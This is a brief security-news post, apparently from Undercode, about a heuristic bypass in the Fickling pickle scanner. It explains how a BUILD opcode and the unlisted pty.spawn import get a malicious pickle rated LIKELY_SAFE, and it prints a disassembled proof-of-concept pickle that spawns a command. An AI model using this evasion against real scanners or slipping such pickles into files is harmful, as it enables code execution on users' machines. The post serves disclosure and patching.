Listen to this Post
This vulnerability exploits a heuristic bypass in Fickling, a security tool for analyzing Python pickle files. Fickling relies on detecting unused variables left on the Python pickle virtual machine stack after execution to flag potentially malicious files. Opcodes like REDUCE, OBJ, and INST, which can trigger arbitrary code execution, often leave a value on the stack. Attackers can bypass this detection by crafting a pickle file that includes a trivial operation, such as a BUILD opcode, to “use” this leftover variable—for instance, by adding a setstate method. This tricks Fickling into marking the file as safe. Specifically, the bypass involved importing the ‘pty’ module and using pty.spawn() for code execution, which was missing from Fickling’s block list of unsafe imports. Consequently, malicious pickles designed to execute commands are incorrectly classified as LIKELY_SAFE, leading to arbitrary code execution if the deceptive file is unpickled.
Platform: Fickling
Version: Pre-fix versions
Vulnerability: Heuristic bypass
Severity: Critical
Date: Unknown
Prediction: Fixed in PR187
What Undercode Say:
fickling -r malicious.pkl
0: \x80 PROTO 4 2: \x95 FRAME 26 11: \x8c SHORT_BINUNICODE 'pty' 16: \x94 MEMOIZE 17: \x8c SHORT_BINUNICODE 'spawn' 24: \x94 MEMOIZE 25: \x93 STACK_GLOBAL 26: \x94 MEMOIZE 27: \x8c SHORT_BINUNICODE 'id' 31: \x94 MEMOIZE 32: \x85 TUPLE1 33: \x94 MEMOIZE 34: R REDUCE 35: \x94 MEMOIZE 36: \x8c SHORT_BINUNICODE 'gottem' 44: \x94 MEMOIZE 45: b BUILD 46: . STOP
How Exploit:
Craft pickle with pty.spawn() and BUILD opcode.
Protection from this CVE:
Update Fickling version.
Impact:
Arbitrary code execution.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

